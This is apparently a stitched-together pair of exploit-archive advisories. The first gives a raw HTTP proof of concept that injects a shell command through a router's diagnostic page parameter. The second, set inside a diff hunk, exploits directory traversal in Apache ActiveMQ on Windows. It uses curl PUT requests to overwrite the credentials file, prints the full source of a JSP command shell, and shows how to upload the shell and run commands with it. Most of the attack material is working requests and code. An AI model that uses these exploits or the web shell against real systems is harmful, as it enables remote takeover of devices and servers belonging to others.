 The page located at /network_diagnostic_tools.php has a feature called test connectivity, which is carried out through a post request to /actionHandler/ajax_network_diagnostic_tools.php. The parameter destination_address is vulnerable to command injection.
 PoC:
 POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1
 Host: 10.0.0.1
 User-Agent:
 Accept: application/json, text/javascript, */*; q=0.01
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 X-Requested-With: XMLHttpRequest
 Referer: http://10.0.0.1/network_diagnostic_tools.php
 Content-Length: 91
 Cookie: PHPSESSID=; auth=
 DNT: 1
 X-Forwarded-For: 8.8.8.8
 Connection: keep-alive
 test_connectivity=true&destination_address=www.comcast.net || ping -c3 attackerip; &count1=4
 If you open up wireshark and set ip.dst==attackerip and icmp you will see that the router issues 3 icmp echo requests, proving successful command injection.  This can be leveraged to completely compromise the device.
 This vulnerability is also particularly dangerous because there is no CSRF protections in this application as demonstrated here https://www.exploit-db.com/exploits/40853/
--- a/platforms/windows/remote/40857.txt
+++ b/platforms/windows/remote/40857.txt
@ -0,0 +1,71 @@
 I have recently been playing with Apache ActiveMQ, and came across a simple but interesting directory traversal flaw in the fileserver upload/download functionality. 
 I have only been able to reproduce this on Windows, i.e. where "\" is a path delimiter. 
 An attacker could use this flaw to upload arbitrary files to the server, including a JSP shell, leading to remote code execution.
 Exploiting Windows systems to achieve RCE The default conf/jetty.xml includes:
 <bean class="org.eclipse.jetty.security.ConstraintMapping" id="securityConstraintMapping">  
     <property name="constraint" ref="securityConstraint">  
     <property name="pathSpec" value="/api/*,/admin/*,*.jsp">  
   </property></property>  
 </bean>  
 Effectively blocking the upload of JSP files into contexts that will allow them to execute. 
 I imagine there are many ways around this; for my proof of concept I opted to overwrite conf/jetty-realm.properties and set my own credentials:
 $ cat jetty-realm.properties hacker: hacker, admin
 $ curl -v -X PUT --data "@jetty-realm.properties" http://TARGET:8161/fileserver/..\\conf\\jetty-realm.properties
 This seems to have the disadvantage of requiring a reboot of the server to take effect. 
 I am not sure if that is always the case, but if so, I'm pretty sure there is some other workaround that wouldn't require a reboot. 
 The attacker can then take a standard JSP shell:
 $ cat cmd.jsp 
 <%@ page import="java.util.*,java.io.*"%>  
 <%  
 %>  
 <HTML><BODY>  
 Commands with JSP  
 <FORM METHOD="GET" NAME="myform" ACTION="">  
 <INPUT TYPE="text" NAME="cmd">  
 <INPUT TYPE="submit" VALUE="Send">  
 </FORM>  
 <pre>  
 <%  
 if (request.getParameter("cmd") != null) {  
 out.println("Command: " + request.getParameter("cmd") + "<BR>");  
 Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));  
 OutputStream os = p.getOutputStream();  
 InputStream in = p.getInputStream();  
 DataInputStream dis = new DataInputStream(in);  
 String disr = dis.readLine();  
 while ( disr != null ) {  
 out.println(disr);  
 disr = dis.readLine();  
 }  
 }  
 %>  
 </pre>  
 </BODY></HTML>  
 Upload it, exploiting the "..\" directory traversal flaw to put it into an executable context:
 $ curl -u 'hacker:hacker' -v -X PUT --data "@cmd.jsp" http://TARGET:8161/fileserver/..\\admin\\cmd.jsp
 And pop a calc on the server:
 $ curl -u 'hacker:hacker' -v -X GET http://TARGET:8161/admin/cmd.jsp?cmd=calc.exe
 Exploiting non-Windows servers
 All attempts at directory traversal on a Linux system failed - encoded, double encoded, and UTF-8 encoded "../" were all caught by Jetty. Only "..\" worked. 
 That said, clients can specify the uploadUrl for a blob transfer, e.g.:
 tcp://localhost:61616?jms.blobTransferPolicy.uploadUrl=http://foo.com
 An attacker able to enqueue messages could use this to perform server side request forgery to an arbitrary uploadUrl target, even when running on non-Windows servers.
 Resolution
 The ActiveMQ project has released an advisory and patches. 
 This is not the first instance of such a flaw in an open source Java application; CVE-2014-7816 comes to mind. 
 It demonstrates that while Java may be platform independent, many developers are used to developing for a particular OS, and don't necessarily take cross-platform concerns into account.